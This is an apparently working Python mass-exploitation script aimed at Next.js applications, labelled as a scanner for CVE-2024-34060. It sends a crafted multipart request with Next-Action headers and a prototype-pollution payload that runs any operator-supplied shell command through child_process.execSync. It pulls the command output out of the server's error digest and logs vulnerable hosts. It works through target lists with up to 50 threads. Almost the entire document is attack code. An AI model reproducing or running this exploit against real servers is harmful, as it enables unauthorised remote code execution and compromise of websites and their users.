#!/usr/bin/env python3 import requests import argparse from colorama import init, Fore, Style import re import sys from concurrent.futures import ThreadPoolExecutor, as_completed init(autoreset=True) requests.packages.urllib3.disable_warnings() import base64 from colorama import Fore, Style def print_banner(): b64 = ( "X19fICBfICAgXyAgIF9fX19fIF8gICBfIAovIF8gXHwgXCAgfCB8X19fX3wgXCB8IHwgfCB8IHwgfCAgX3wgLyBfIFwgICBfX18gIFwgfCB8ClwgX18gIHwgIFwgXCB8ICBfX3wgIFwgfCB8IF9fIHwgIFwgfCAvIF9fLyB8ICBfX3wgIFwgfCB8ClxfX19fL3xffCBcX3xffF9fX18vfF98XF9ffFxfX18vXF9fX19ffFxfX19ffF98XF9ffApcblsrXSBBdXRob3I6IEFkaXQgR2FudGVuZyB4IEJvYgpbK10gVGFyZ2V0OiBOZXh0LmpzIEFwcGxpY2F0aW9ucwpsW10gV2ViOiBzdWthYnVtaWJsYWNraGF0LmNvbQ==" ) decoded = base64.b64decode(b64).decode() print(Fore.RED + decoded + Style.RESET_ALL) print_banner() parser = argparse.ArgumentParser(description="Accurate CVE-2024-34060 Scanner (Real RCE Only)") parser.add_argument("-u", "--url", help="Single target URL") parser.add_argument("-l", "--list", help="List target (file)") parser.add_argument("-c", "--command", required=True, help="Command to execute") parser.add_argument("-t", "--threads", default=50, type=int, help="Threads") args = parser.parse_args() targets = [] if args.list: try: with open(args.list, "r") as f: raw = [x.strip() for x in f if x.strip()] targets = list(dict.fromkeys(raw)) print(Fore.YELLOW + f"[INFO] Loaded {len(targets)} targets" + Style.RESET_ALL) except: print(Fore.RED + "File list tidak ditemukan") sys.exit(1) elif args.url: targets = [args.url] else: print(Fore.RED + "Gunakan -u atau -l") sys.exit(1) COMMAND = args.command THREADS = args.threads headers = { "User-Agent": "Mozilla/5.0", "Next-Action": "x", "X-Nextjs-Request-Id": "b5dce965", "X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9" } PAYLOAD = f'''{{ "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{{\\"then\\":\\"$B1337\\"}}", "_response": {{ "_prefix": "var res=process.mainModule.require('child_process').execSync('{COMMAND}',{{timeout:5000}}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{{digest:`${{res}}`}});", "_chunks": "$Q2", "_formData": {{"get": "$1:constructor:constructor"}} }} }}''' files = { "0": (None, PAYLOAD), "1": (None, '"$@0"'), "2": (None, '[]') } def extract_output(text): m = re.search(r'"digest"\s*:\s*"([^"]+)"', text) if m: return m.group(1).strip() m2 = re.search(r'digest:\s*`(.+?)`', text, re.DOTALL) if m2: return m2.group(1).strip() return None def scan_target(raw_url): url = raw_url if raw_url.startswith("http") else "https://" + raw_url try: r = requests.post(url, headers=headers, files=files, timeout=10, verify=False) body = r.text.strip() if r.status_code == 500: out = extract_output(body) if out: with open("vuln.txt", "a") as lf: lf.write(f"\n[VULN] {url}\nCMD: {COMMAND}\nOUT:\n{out}\n---\n") return f"[VULN] {url} → OUT: {out}" else: return f"[WEAK] {url} (vuln tapi tidak ada output)" else: return f"[NOT] {url} ({r.status_code})" except Exception as e: return f"[ERR] {url} -> {e}" open("vuln.txt", "w").close() print(Fore.YELLOW + f"[INFO] Start scanning with {THREADS} threads..." + Style.RESET_ALL) with ThreadPoolExecutor(max_workers=THREADS) as executor: futures = {executor.submit(scan_target, t): t for t in targets} for fut in as_completed(futures): result = fut.result() if result.startswith("[VULN]"): print(Fore.GREEN + result + Style.RESET_ALL) elif result.startswith("[WEAK]"): print(Fore.MAGENTA + result + Style.RESET_ALL) elif result.startswith("[ERR]"): print(Fore.RED + result + Style.RESET_ALL) else: print(Fore.BLUE + result + Style.RESET_ALL) print(Fore.GREEN + "\n[✓] Scan selesai!" + Style.RESET_ALL) print(Fore.YELLOW + "[✓] Log tersimpan hanya untuk RCE valid → vuln.txt" + Style.RESET_ALL)